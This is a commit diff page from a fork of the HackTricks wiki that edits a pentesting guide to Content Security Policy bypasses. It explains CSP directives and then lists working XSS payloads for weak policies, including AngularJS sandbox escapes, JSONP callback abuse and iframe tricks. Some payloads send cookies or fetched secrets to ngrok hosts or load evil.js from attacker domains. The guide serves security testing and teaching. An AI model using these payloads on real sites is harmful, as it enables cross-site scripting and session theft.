coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] one page modified

Browse Source
This commit is contained in:
CPol 2021-04-23 10:43:58 +00:00 committed by gitbook-bot
parent da8c34e952
commit 085b54ff89
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 74 additions and 70 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

144
pentesting-web/content-security-policy-csp-bypass.md
View File

@ -4,7 +4,19 @@
Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting \(XSS\)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more. Here is an example of allowing resource from the local domain \(self\) to be loaded and executed in-line and allow string code executing functions like `eval`, `setTimeout` or `setInterval:`
`Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval';`
Content Security Policy is implemented via **response headers** or **meta elements of the HTML page**. The browser follows the received policy and actively blocks violations as they are detected.
Implemented via response header:
```http
Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';
```
Implemented via meta tag:
```markup
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
```
### Headers
@ -13,6 +25,8 @@ Content Security Policy or CSP is a built-in browser technology which **helps pr
## Defining resources
CSP works by restricting the origins that active and passive content can be loaded from. It can additionally restrict certain aspects of active content such as the execution of inline javascript, and the use of `eval()`.
```text
default-src 'none';
img-src 'self';
@ -25,7 +39,7 @@ media-src https://videos.cdn.mozilla.net;
object-src 'none';
```
### Some definitions
### Directives
* **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into elements, but also things like inline script event handlers \(onclick\) and XSLT stylesheets which can trigger script execution.
* **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default.
@ -35,7 +49,7 @@ object-src 'none';
* **frame-ancestors**: This directive specifies the sources that can embed the current page. This directive applies to , , , and tags. This directive can't be used in tags and applies only to non-HTML resources.
* **img-src**: It defines allowed sources to load images on the web page.
* **font-src:** directive specifies valid sources for fonts loaded using `@font-face`.
* **Manifest-src**: This directive defines allowed sources of application manifest files.
* **manifest-src**: This directive defines allowed sources of application manifest files.
* **media-src**: It defines allowed sources from where media objects like , and can be loaded.
* **object-src**: It defines allowed sources for the &lt;object&gt;, &lt;embed&gt;, and &lt;applet&gt; elements elements.
* **base-uri**: It defines allowed URLs which can be loaded using element.
@ -44,9 +58,9 @@ object-src 'none';
* **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten.
* **sandbox**: sandbox directive enables a sandbox for the requested resource similar to the sandbox attribute. It applies restrictions to a page's actions including preventing popups, preventing the execution of plugins and scripts, and enforcing a same-origin policy.
### **Definitions of values**
### **Sources**
* \*: This allows any URL except data: blob: filesystem: schemes
* \*: This allows any URL except `data:` , `blob:` , `filesystem:` schemes
* **self**: This source defines that loading of resources on the page is allowed from the same domain.
* **data**: This source allows loading resources via the data scheme \(eg Base64 encoded images\)
* **none**: This directive allows nothing to be loaded from any source.
@ -54,87 +68,66 @@ object-src 'none';
* **unsafe-hashes**: This allows to enable specific inline event handlers.
* **unsafe-inline**: This allows the use of inline resources, such as inline elements, javascript: URLs, inline event handlers, and inline elements. Again this is not recommended for security reasons.
* **nonce**: A whitelist for specific inline scripts using a cryptographic nonce \(number used once\). The server must generate a unique nonce value each time it transmits a policy.
### Common Values
```text
'self' --> Your own domain
'none' --> Anything
https://code.jquery.com --> A Domain
'unsafe-inline' --> Allows <script> and <style> chunks tobe interpreted
'unsafe-eval' --> Allows string code executing functions like eval, setTimeout, setInterval or CSSStyleSheet.insertRule()
'nonce-2726c7f26c' --> Allows the content with that nonce inside the HTML: <script nonce="2726c7f26c">
'sha256-cLuU6nVzrYJlo7rUa6TMmz3nylPFrPQrEUpOHllb5ic=' --> The chunk with that hash inside the HTML can be execut
```
```text
sameSite: 'strict'
default-src 'self' 'unsafe-inline';
img-src *;
```
* **sha256-&lt;hash&gt;**: Whitelist scripts with an specific sha256 hash
## Unsafe Scenarios
### 'unsafe-inline'
```text
Content-Security-Policy: script-src https://google.com 'unsafe-inline' https://*;
child-src 'none';
report-uri /Report-parsing-url;
```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-inline';
```
Working payload: `"/><script>alert(1);</script>`
### 'unsafe-eval'
```text
Content-Security-Policy: script-src https://google.com 'unsafe-eval' data: http://*;
child-src 'none';
report-uri /Report-parsing-url;
```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-eval';
```
Working payload: `<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>`
### 'unsafe-eval' + JS CDN
```markup
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };var z=new XMLHttpRequest();z.onreadystatechange=function(){if (z.responseText) location="http://af4255a9ed70.ngrok.io?a="+btoa(unescape(encodeURIComponent(z.responseText)))};z.open("GET","http://127.0.0.1/secret",false);z.send();//');}} </div>
```
### Wildcard
```text
```yaml
Content-Security-Policy: script-src 'self' https://google.com https: data *;
child-src 'none';
report-uri /Report-parsing-url;
```
Working payload: `"/>'><script src=https://attacker.com/evil.js></script>`
Working payload:
```markup
"/>'><script src=https://attacker-website.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>
```
### Lack of object-src and default-src
```text
Content-Security-Policy: script-src 'self'
report-uri /Report-parsing-url;
```yaml
Content-Security-Policy: script-src 'self' ;
```
Working payloads:
* `<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> </object>`
* `">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'><param name="AllowScriptAccess" value="always"></object>`
```markup
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
```
### File Upload + 'self'
```text
Content-Security-Policy: script-src 'self';
object-src 'none' ;
report-uri /Report-parsing-url;
```yaml
Content-Security-Policy: script-src 'self'; object-src 'none' ;
```
If you can upload a JS file you can bypass this CSP:
Working payload: `"/>'><script src="/user_upload/mypic.png.js"></script>`
Working payload:
```markup
"/>'><script src="/uploads/picture.png.js"></script>
```
However, it's highly probable that the server is **validating the uploaded file** and will only allow you to **upload determined type of files**.
@ -142,17 +135,20 @@ Moreover, even if you could upload a **JS code inside** a file using a extension
From here, if you find a XSS and a file upload, and you manage to find a **misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot \([some polyglot examples here](https://github.com/Polydet/polyglot-database)\).
### Allowing third party endpoints
### Third Party Endpoints + 'unsafe-eval'
#### Arbitrary JS files loaded from whitelisted endpoints
```text
Content-Security-Policy: script-src 'self' https://cdnjs.cloudflare.com/;
object-src 'none' ;
report-uri /Report-parsing-url;
```yaml
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
```
Working payloads abusing cdnjs.cloudflare.com:
Load a vulnerable version of angular and execute arbitrary JS:
```markup
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
```
#### Other payloads:
```markup
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
@ -168,15 +164,20 @@ Working payloads abusing cdnjs.cloudflare.com:
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
```
#### JSONP
### Third Party Endpoints + JSONP
```text
Content-Security-Policy: script-src 'self' https://www.google.com;
```http
Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none';
```
In such scenarios where script-src is set to self and a particular domain which is whitelisted, it can be bypassed using jsonp. [jsonp](https://github.com/zigoo0/JSONBee) endpoints allow insecure callback methods which allow an attacker to perform xss.
Scenarios like this where `script-src` is set to `self` and a particular domain which is whitelisted can be bypassed using JSONP. JSONP endpoints allow insecure callback methods which allow an attacker to perform XSS, working payload:
Working payload: `"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>`
```markup
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
```
[JSONBee](https://github.com/zigoo0/JSONBee) contains a ready to use JSONP endpoints to CSP bypass of different websites.
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect**, because if the initial endpoint is trusted, redirects are trusted.
@ -187,18 +188,19 @@ This leads to a possible bypass, by using "**%2f..%2f**" if server decodes it. F
Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
### Through iframes
### Iframes JS execution
```text
Content-Security-Policy:
default-src 'self' data: *; connect-src 'self'; script-src 'self' ;
report-uri /_csp; upgrade-insecure-requests
```yaml
Content-Security-Policy: default-src 'self'; connect-src 'self'; script-src 'self';
```
Working payloads:
```markup
#This one requires the data: scheme to be allowed
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
#This one injects JS in a jsonp endppoint
<iframe srcdoc='<script src="/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
* sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
@ -360,5 +362,7 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_&y=
{% embed url="https://medium.com/bugbountywriteup/content-security-policy-csp-bypass-techniques-e3fa475bfe5d" %}
{% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy\#allowed-data-scheme" %}